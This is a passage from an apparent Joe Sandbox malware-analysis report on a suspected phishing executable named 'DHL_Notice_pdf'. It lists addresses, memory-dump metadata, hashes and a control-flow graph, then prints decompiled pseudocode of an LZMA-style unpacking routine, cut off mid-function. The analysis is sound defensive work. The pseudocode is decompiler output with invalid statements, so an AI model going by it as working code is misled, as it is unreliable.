                                                            0x0040728a
                                                            0x004075b1
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x00000000
                                                            0x00000000
                                                            0x00407395
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x0040739b
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x0040749d
                                                            0x00407458
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407543
                                                            0x00407546
                                                            0x00407447
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x0040744d
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x0040749d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725b
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f44
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d
                                                            0x00406f60
                                                            0x00406f62
                                                            0x00406f65
                                                            0x00406f68
                                                            0x00406f6b
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00000000
                                                            0x00000000
                                                            0x004070cf
                                                            0x004070cf
                                                            0x004070d3
                                                            0x00407599
                                                            0x00407599
                                                            0x00000000
                                                            0x00407599
                                                            0x004070d9
                                                            0x004070d9
                                                            0x004070dc
                                                            0x004070df
                                                            0x004070e2
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070ea
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f3
                                                            0x004070f6
                                                            0x004070f7
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070fc
                                                            0x004070ff
                                                            0x00407102
                                                            0x00407105
                                                            0x00407105
                                                            0x00407105
                                                            0x00407108
                                                            0x0040710a
                                                            0x0040710a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040734c
                                                            0x0040734c
                                                            0x0040734c
                                                            0x00407350
                                                            0x00000000
                                                            0x00000000
                                                            0x00407356
                                                            0x00407356
                                                            0x00407359
                                                            0x0040735c
                                                            0x0040735f
                                                            0x00407361
                                                            0x00407361
                                                            0x00407361
                                                            0x00407364
                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x00407390
                                                            0x0040710d
                                                            0x0040710d
                                                            0x00000000
                                                            0x0040710d
                                                            0x0040738e
                                                            0x004075c3
                                                            0x004075c3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x004075fa
                                                            0x004075fa
                                                            0x00000000
                                                            0x004075fa
                                                            0x00407447
                                                            0x004074c7
                                                            0x00407490

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 749 407395-407399 750 4073bb-4073c8 749->750 751 40739b-40749d 749->751 753 4073cb-4073e0 750->753 761 4074c7-4074cb 751->761 754 4073e2-4073f8 753->754 755 4073fa-407410 753->755 757 407413-40741a 754->757 755->757 759 407441 757->759 760 40741c-407420 757->760 766 407447-40744d 759->766 764 407426-40743e 760->764 765 4075cf-4075d9 760->765 762 40752b-40753e 761->762 763 4074cd-4074ee 761->763 762->766 767 4074f0-407505 763->767 768 407507-40751a 763->768 764->759 769 4075e5-4075f8 765->769 771 406bf2 766->771 772 4075fa 766->772 773 40751d-407524 767->773 768->773 774 4075fd-407601 769->774 775 406bf9-406bfd 771->775 776 406d39-406d5a 771->776 777 406c9e-406ca2 771->777 778 406d0e-406d12 771->778 772->774 779 4074c4 773->779 780 407526 773->780 775->769 781 406c03-406c10 775->781 776->753 785 406ca8-406cc1 777->785 786 40754e-407558 777->786 782 406d18-406d2c 778->782 783 40755d-407567 778->783 779->761 787 4074a9-4074c1 780->787 788 4075db 780->788 781->772 789 406c16-406c5c 781->789 790 406d2f-406d37 782->790 783->769 791 406cc4-406cc8 785->791 786->769 787->779 788->769 792 406c84-406c86 789->792 793 406c5e-406c62 789->793 790->776 790->778 791->777 794 406cca-406cd0 791->794 799 406c94-406c9c 792->799 800 406c88-406c92 792->800 797 406c64-406c67 GlobalFree 793->797 798 406c6d-406c7b GlobalAlloc 793->798 795 406cd2-406cd9 794->795 796 406cfa-406d0c 794->796 801 406ce4-406cf4 GlobalAlloc 795->801 802 406cdb-406cde GlobalFree 795->802 796->790 797->798 798->772 803 406c81 798->803 799->791 800->799 800->800 801->772 801->796 802->801 803->792
                                                            C-Code - Quality: 98%
                                                            			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
